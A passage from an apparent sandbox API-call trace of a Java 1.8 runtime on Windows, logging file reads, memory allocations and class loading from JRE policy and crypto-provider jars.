Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" [0112.582] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0112.582] free (_Block=0x1221ba40) [0112.582] calloc (_Count=0x1, _Size=0xa8) returned 0x12324b70 [0112.582] ReadFile (in: hFile=0x2d4, lpBuffer=0x208db90, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x208db40, lpOverlapped=0x0 | out: lpBuffer=0x208db90*, lpNumberOfBytesRead=0x208db40*=0x4, lpOverlapped=0x0) returned 1 [0112.584] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x208db70, dwMoveMethod=0x2 | out: lpNewFilePointer=0x208db70*=3035) returned 1 [0112.584] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xb5b, lpNewFilePointer=0x208d940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d940*=2907) returned 1 [0112.584] ReadFile (in: hFile=0x2d4, lpBuffer=0x208d9a0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x208d910, lpOverlapped=0x0 | out: lpBuffer=0x208d9a0*, lpNumberOfBytesRead=0x208d910*=0x80, lpOverlapped=0x0) returned 1 [0112.585] malloc (_Size=0x48) returned 0x12ef31a0 [0112.585] malloc (_Size=0x193) returned 0x1221ba40 [0112.585] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xa48, lpNewFilePointer=0x208db30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db30*=2632) returned 1 [0112.585] ReadFile (in: hFile=0x2d4, lpBuffer=0x1221ba40, nNumberOfBytesToRead=0x193, lpNumberOfBytesRead=0x208db00, lpOverlapped=0x0 | out: lpBuffer=0x1221ba40*, lpNumberOfBytesRead=0x208db00*=0x193, lpOverlapped=0x0) returned 1 [0112.585] free (_Block=0x0) [0112.585] malloc (_Size=0x15) returned 0x12edc1b0 [0112.586] malloc (_Size=0x48) returned 0x12ef34c0 [0112.586] malloc (_Size=0x15) returned 0x12edc8f0 [0112.586] free (_Block=0x12edc1b0) [0112.586] free (_Block=0x12ef31a0) [0112.587] malloc (_Size=0x48) returned 0x12ef31a0 [0112.587] malloc (_Size=0x16) returned 0x12edc130 [0112.587] free (_Block=0x12edc8f0) [0112.587] free (_Block=0x12ef34c0) [0112.587] malloc (_Size=0x48) returned 0x12ef34c0 [0112.587] malloc (_Size=0xa) returned 0x12edc3b0 [0112.588] free (_Block=0x12edc130) [0112.588] free (_Block=0x12ef31a0) [0112.588] malloc (_Size=0x48) returned 0x12ef29d0 [0112.588] malloc (_Size=0x15) returned 0x12edc4d0 [0112.589] free (_Block=0x12edc3b0) [0112.589] free (_Block=0x121a5570) [0112.589] free (_Block=0x12ef34c0) [0112.590] malloc (_Size=0x48) returned 0x12ef34c0 [0112.590] malloc (_Size=0xa0) returned 0x123243e0 [0112.590] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xa48, lpNewFilePointer=0x208d5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5f0*=2632) returned 1 [0112.590] ReadFile (in: hFile=0x2d4, lpBuffer=0x123243e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d5c0, lpOverlapped=0x0 | out: lpBuffer=0x123243e0*, lpNumberOfBytesRead=0x208d5c0*=0xa0, lpOverlapped=0x0) returned 1 [0112.590] malloc (_Size=0x15) returned 0x12edc8f0 [0112.591] free (_Block=0x12edc4d0) [0112.591] free (_Block=0x12ef29d0) [0112.592] calloc (_Count=0x1, _Size=0x58) returned 0x12ee95c0 [0112.592] malloc (_Size=0x1bf0) returned 0x12eea380 [0112.592] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x208b7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7b0*=0) returned 1 [0112.592] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b800, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b780, lpOverlapped=0x0 | out: lpBuffer=0x208b800*, lpNumberOfBytesRead=0x208b780*=0x1e, lpOverlapped=0x0) returned 1 [0112.592] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x32, lpNewFilePointer=0x208b810, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b810*=50) returned 1 [0112.592] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b920, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x208b7e0, lpOverlapped=0x0 | out: lpBuffer=0x208b920*, lpNumberOfBytesRead=0x208b7e0*=0xe1, lpOverlapped=0x0) returned 1 [0112.593] malloc (_Size=0x8000) returned 0x12ef5680 [0112.596] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x32, lpNewFilePointer=0x208b8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8c0*=50) returned 1 [0112.596] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b9d0, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x208b890, lpOverlapped=0x0 | out: lpBuffer=0x208b9d0*, lpNumberOfBytesRead=0x208b890*=0xe1, lpOverlapped=0x0) returned 1 [0112.597] malloc (_Size=0x48) returned 0x12ef2b60 [0112.597] malloc (_Size=0xa0) returned 0x12324cd0 [0112.598] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xa8a, lpNewFilePointer=0x208d710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d710*=2698) returned 1 [0112.598] ReadFile (in: hFile=0x2d4, lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d6e0, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208d6e0*=0xa0, lpOverlapped=0x0) returned 1 [0112.598] malloc (_Size=0x15) returned 0x12edc130 [0112.598] free (_Block=0x12edc8f0) [0112.598] free (_Block=0x12ef34c0) [0112.599] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x123, lpNewFilePointer=0x208b860, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b860*=291) returned 1 [0112.599] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b8b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b830, lpOverlapped=0x0 | out: lpBuffer=0x208b8b0*, lpNumberOfBytesRead=0x208b830*=0x1e, lpOverlapped=0x0) returned 1 [0112.599] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x155, lpNewFilePointer=0x208b8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8c0*=341) returned 1 [0112.599] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b9d0, nNumberOfBytesToRead=0x12f, lpNumberOfBytesRead=0x208b890, lpOverlapped=0x0 | out: lpBuffer=0x208b9d0*, lpNumberOfBytesRead=0x208b890*=0x12f, lpOverlapped=0x0) returned 1 [0112.600] malloc (_Size=0x48) returned 0x12ef2d40 [0112.600] malloc (_Size=0xa0) returned 0x123243e0 [0112.600] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xacc, lpNewFilePointer=0x208d710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d710*=2764) returned 1 [0112.600] ReadFile (in: hFile=0x2d4, lpBuffer=0x123243e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d6e0, lpOverlapped=0x0 | out: lpBuffer=0x123243e0*, lpNumberOfBytesRead=0x208d6e0*=0xa0, lpOverlapped=0x0) returned 1 [0112.600] malloc (_Size=0x16) returned 0x12edc450 [0112.601] free (_Block=0x12edc130) [0112.601] free (_Block=0x12ef2b60) [0112.603] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x294, lpNewFilePointer=0x208b860, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b860*=660) returned 1 [0112.603] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b8b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b830, lpOverlapped=0x0 | out: lpBuffer=0x208b8b0*, lpNumberOfBytesRead=0x208b830*=0x1e, lpOverlapped=0x0) returned 1 [0112.603] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x2c7, lpNewFilePointer=0x208b8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8c0*=711) returned 1 [0112.603] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b9d0, nNumberOfBytesToRead=0x52b, lpNumberOfBytesRead=0x208b890, lpOverlapped=0x0 | out: lpBuffer=0x208b9d0*, lpNumberOfBytesRead=0x208b890*=0x52b, lpOverlapped=0x0) returned 1 [0112.640] malloc (_Size=0x48) returned 0x12ef29d0 [0112.640] malloc (_Size=0x91) returned 0x12ed5160 [0112.640] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xb4a, lpNewFilePointer=0x208d810, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d810*=2890) returned 1 [0112.640] ReadFile (in: hFile=0x2d4, lpBuffer=0x12ed5160, nNumberOfBytesToRead=0x91, lpNumberOfBytesRead=0x208d7e0, lpOverlapped=0x0 | out: lpBuffer=0x12ed5160*, lpNumberOfBytesRead=0x208d7e0*=0x91, lpOverlapped=0x0) returned 1 [0112.640] malloc (_Size=0x15) returned 0x12edc8f0 [0112.643] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x83f, lpNewFilePointer=0x208b550, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b550*=2111) returned 1 [0112.643] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b5a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b520, lpOverlapped=0x0 | out: lpBuffer=0x208b5a0*, lpNumberOfBytesRead=0x208b520*=0x1e, lpOverlapped=0x0) returned 1 [0112.643] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x871, lpNewFilePointer=0x208b5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5b0*=2161) returned 1 [0112.643] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b6c0, nNumberOfBytesToRead=0x8d, lpNumberOfBytesRead=0x208b580, lpOverlapped=0x0 | out: lpBuffer=0x208b6c0*, lpNumberOfBytesRead=0x208b580*=0x8d, lpOverlapped=0x0) returned 1 [0112.643] free (_Block=0x12edc450) [0112.643] free (_Block=0x12ef2d40) [0112.648] malloc (_Size=0x48) returned 0x12ef31a0 [0112.649] malloc (_Size=0xc) returned 0x12edc5d0 [0112.649] free (_Block=0x12edc8f0) [0112.649] free (_Block=0x12ef29d0) [0112.650] free (_Block=0x12ef5680) [0112.650] free (_Block=0x12eea380) [0112.650] free (_Block=0x12ee95c0) [0112.651] free (_Block=0x12edc5d0) [0112.651] free (_Block=0x12ef31a0) [0112.651] free (_Block=0x12ee93e0) [0112.651] free (_Block=0x12ec3f50) [0112.651] free (_Block=0x12edc730) [0112.651] free (_Block=0x12edc290) [0112.651] free (_Block=0x12edc770) [0112.651] free (_Block=0x12edc790) [0112.651] free (_Block=0x12edc7b0) [0112.651] free (_Block=0x12ef0c30) [0112.651] free (_Block=0x1221ba40) [0112.652] CloseHandle (hObject=0x2d4) returned 1 [0112.652] free (_Block=0x12324b70) [0112.658] strlen (_Str="sun/net/www/protocol/http/Handler") returned 0x21 [0112.659] strlen (_Str="sun/net/www/protocol/http/Handler.class") returned 0x27 [0112.659] malloc (_Size=0x48) returned 0x12ef29d0 [0112.659] malloc (_Size=0xa0) returned 0x12324b70 [0112.659] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f150b, lpNewFilePointer=0x208df80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df80*=54465803) returned 1 [0112.659] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208df50, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208df50*=0xa0, lpOverlapped=0x0) returned 1 [0112.659] malloc (_Size=0x28) returned 0x12ef06f0 [0112.673] strlen (_Str="javax/crypto/JceSecurity$2.class") returned 0x20 [0112.673] strlen (_Str="javax/crypto/JceSecurity$2.class") returned 0x20 [0112.673] malloc (_Size=0x48) returned 0x12ef34c0 [0112.673] malloc (_Size=0xa0) returned 0x12324b70 [0112.673] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1bf49, lpNewFilePointer=0x208e470, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e470*=114505) returned 1 [0112.673] ReadFile (in: hFile=0x2c8, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e440, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208e440*=0xa0, lpOverlapped=0x0) returned 1 [0112.673] malloc (_Size=0x21) returned 0x12ef0720 [0112.678] strlen (_Str="java/util/Collections$SynchronizedRandomAccessList.class") returned 0x38 [0112.678] malloc (_Size=0x48) returned 0x12ef2b10 [0112.678] malloc (_Size=0xa0) returned 0x123243e0 [0112.678] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x333b469, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=53720169) returned 1 [0112.678] ReadFile (in: hFile=0x134, lpBuffer=0x123243e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x123243e0*, lpNumberOfBytesRead=0x208e390*=0xa0, lpOverlapped=0x0) returned 1 [0112.681] malloc (_Size=0x39) returned 0x12ef2ca0 [0112.689] strlen (_Str="sun/net/www/protocol/jar/Handler") returned 0x20 [0112.699] strlen (_Str="javax/crypto/JarVerifier$2.class") returned 0x20 [0112.699] strlen (_Str="javax/crypto/JarVerifier$2.class") returned 0x20 [0112.699] malloc (_Size=0x48) returned 0x12ef29d0 [0112.700] malloc (_Size=0xa0) returned 0x12324b70 [0112.700] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1b389, lpNewFilePointer=0x208e2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2e0*=111497) returned 1 [0112.700] ReadFile (in: hFile=0x2c8, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e2b0, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208e2b0*=0xa0, lpOverlapped=0x0) returned 1 [0112.700] malloc (_Size=0x21) returned 0x12ef0c30 [0112.703] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0x3e [0112.703] malloc (_Size=0x88) returned 0x12ed6a80 [0112.704] wcscpy (in: _Dest=0x12ed6a80, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" [0112.704] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2d4 [0112.705] GetFileTime (in: hFile=0x2d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208e258 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208e258*(dwLowDateTime=0xeb3edb58, dwHighDateTime=0x1d709ec)) returned 1 [0112.705] CloseHandle (hObject=0x2d4) returned 1 [0112.706] free (_Block=0x12ed6a80) [0112.706] malloc (_Size=0x3f) returned 0x12ef2ca0 [0112.706] _errno () returned 0x20f6be0 [0112.706] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0x3e [0112.706] strcpy (in: _Dest=0x208de10, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" [0112.706] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0 [0112.706] free (_Block=0x12ef2ca0) [0112.707] strlen (_Str="javax/crypto/JarVerifier$JarHolder.class") returned 0x28 [0112.707] strlen (_Str="javax/crypto/JarVerifier$JarHolder.class") returned 0x28 [0112.707] malloc (_Size=0x48) returned 0x12ef2ca0 [0112.707] malloc (_Size=0xa0) returned 0x123243e0 [0112.707] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1ae08, lpNewFilePointer=0x208d670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d670*=110088) returned 1 [0112.707] ReadFile (in: hFile=0x2c8, lpBuffer=0x123243e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d640, lpOverlapped=0x0 | out: lpBuffer=0x123243e0*, lpNumberOfBytesRead=0x208d640*=0xa0, lpOverlapped=0x0) returned 1 [0112.707] malloc (_Size=0x29) returned 0x12ef4310 [0112.709] free (_Block=0x12ee6f30) [0112.709] free (_Block=0x12ed3fc0) [0112.712] calloc (_Count=0x1, _Size=0x58) returned 0x12ee9080 [0112.712] malloc (_Size=0x1bf0) returned 0x1230da20 [0112.713] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x208ca90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca90*=0) returned 1 [0112.714] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cae0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca60, lpOverlapped=0x0 | out: lpBuffer=0x208cae0*, lpNumberOfBytesRead=0x208ca60*=0x1e, lpOverlapped=0x0) returned 1 [0112.714] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32, lpNewFilePointer=0x208caf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208caf0*=50) returned 1 [0112.714] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cc00, nNumberOfBytesToRead=0x17c6, lpNumberOfBytesRead=0x208cac0, lpOverlapped=0x0 | out: lpBuffer=0x208cc00*, lpNumberOfBytesRead=0x208cac0*=0x17c6, lpOverlapped=0x0) returned 1 [0112.714] malloc (_Size=0x8000) returned 0x12ef5680 [0112.740] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32, lpNewFilePointer=0x208cc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc90*=50) returned 1 [0112.740] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cda0, nNumberOfBytesToRead=0x17c6, lpNumberOfBytesRead=0x208cc60, lpOverlapped=0x0 | out: lpBuffer=0x208cda0*, lpNumberOfBytesRead=0x208cc60*=0x17c6, lpOverlapped=0x0) returned 1 [0112.753] malloc (_Size=0x48) returned 0x12ef2b10 [0112.753] malloc (_Size=0xa0) returned 0x123243e0 [0112.753] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f2f7, lpNewFilePointer=0x208ea80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ea80*=258807) returned 1 [0112.753] ReadFile (in: hFile=0x2d0, lpBuffer=0x123243e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ea50, lpOverlapped=0x0 | out: lpBuffer=0x123243e0*, lpNumberOfBytesRead=0x208ea50*=0xa0, lpOverlapped=0x0) returned 1 [0112.753] malloc (_Size=0x15) returned 0x12edc310 [0112.753] free (_Block=0x12edc3b0) [0112.754] free (_Block=0x12ef29d0) [0112.755] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1808, lpNewFilePointer=0x208cc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc30*=6152) returned 1 [0112.755] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cc80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc00, lpOverlapped=0x0 | out: lpBuffer=0x208cc80*, lpNumberOfBytesRead=0x208cc00*=0x1e, lpOverlapped=0x0) returned 1 [0112.756] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x183a, lpNewFilePointer=0x208cc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc90*=6202) returned 1 [0112.756] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cda0, nNumberOfBytesToRead=0x178f, lpNumberOfBytesRead=0x208cc60, lpOverlapped=0x0 | out: lpBuffer=0x208cda0*, lpNumberOfBytesRead=0x208cc60*=0x178f, lpOverlapped=0x0) returned 1 [0112.763] malloc (_Size=0x48) returned 0x12ef34c0 [0112.763] malloc (_Size=0xa0) returned 0x123246a0 [0112.763] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f339, lpNewFilePointer=0x208ea80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ea80*=258873) returned 1 [0112.763] ReadFile (in: hFile=0x2d0, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ea50, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208ea50*=0xa0, lpOverlapped=0x0) returned 1 [0112.763] malloc (_Size=0x16) returned 0x12edc770 [0112.764] free (_Block=0x12edc310) [0112.764] free (_Block=0x12ef2b10) [0112.765] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2fd9, lpNewFilePointer=0x208cc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc30*=12249) returned 1 [0112.765] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cc80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc00, lpOverlapped=0x0 | out: lpBuffer=0x208cc80*, lpNumberOfBytesRead=0x208cc00*=0x1e, lpOverlapped=0x0) returned 1 [0112.765] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x300c, lpNewFilePointer=0x208cc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc90*=12300) returned 1 [0112.765] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cda0, nNumberOfBytesToRead=0x527, lpNumberOfBytesRead=0x208cc60, lpOverlapped=0x0 | out: lpBuffer=0x208cda0*, lpNumberOfBytesRead=0x208cc60*=0x527, lpOverlapped=0x0) returned 1 [0112.812] malloc (_Size=0x48) returned 0x12ef29d0 [0112.812] malloc (_Size=0xa0) returned 0x123246a0 [0112.812] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f2b5, lpNewFilePointer=0x208ebe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ebe0*=258741) returned 1 [0112.812] ReadFile (in: hFile=0x2d0, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ebb0, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208ebb0*=0xa0, lpOverlapped=0x0) returned 1 [0112.812] malloc (_Size=0x15) returned 0x12edc4d0 [0112.813] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=0) returned 1 [0112.813] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.813] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=50) returned 1 [0112.813] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x17c6, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x17c6, lpOverlapped=0x0) returned 1 [0112.814] free (_Block=0x12edc770) [0112.814] free (_Block=0x12ef34c0) [0112.815] malloc (_Size=0x48) returned 0x12ef2b10 [0112.815] malloc (_Size=0x15) returned 0x12edc550 [0112.815] free (_Block=0x12edc4d0) [0112.816] free (_Block=0x12ef29d0) [0112.817] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1808, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=6152) returned 1 [0112.817] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.817] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x183a, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=6202) returned 1 [0112.817] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x178f, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x178f, lpOverlapped=0x0) returned 1 [0112.819] malloc (_Size=0x48) returned 0x12ef34c0 [0112.819] malloc (_Size=0x16) returned 0x12edc770 [0112.819] free (_Block=0x12edc550) [0112.819] free (_Block=0x12ef2b10) [0112.820] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2fd9, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=12249) returned 1 [0112.820] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.820] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x300c, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=12300) returned 1 [0112.820] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x527, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x527, lpOverlapped=0x0) returned 1 [0112.822] malloc (_Size=0x48) returned 0x12ef2b10 [0112.822] malloc (_Size=0xa) returned 0x12edc310 [0112.822] free (_Block=0x12edc770) [0112.823] free (_Block=0x12ef34c0) [0112.824] malloc (_Size=0x48) returned 0x12ef34c0 [0112.824] malloc (_Size=0x28) returned 0x12ef0720 [0112.824] free (_Block=0x12edc310) [0112.824] free (_Block=0x121a5640) [0112.824] free (_Block=0x12ef2b10) [0112.826] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3580, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=13696) returned 1 [0112.826] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.826] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x35c5, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=13765) returned 1 [0112.826] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x131e, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x131e, lpOverlapped=0x0) returned 1 [0112.828] malloc (_Size=0x48) returned 0x12ef29d0 [0112.828] malloc (_Size=0x37) returned 0x12ef43d0 [0112.829] free (_Block=0x12ef0720) [0112.829] free (_Block=0x12ef34c0) [0112.831] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x48f3, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=18675) returned 1 [0112.832] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.832] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x4947, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=18759) returned 1 [0112.832] ReadFile (in: hFile=0x2d0, 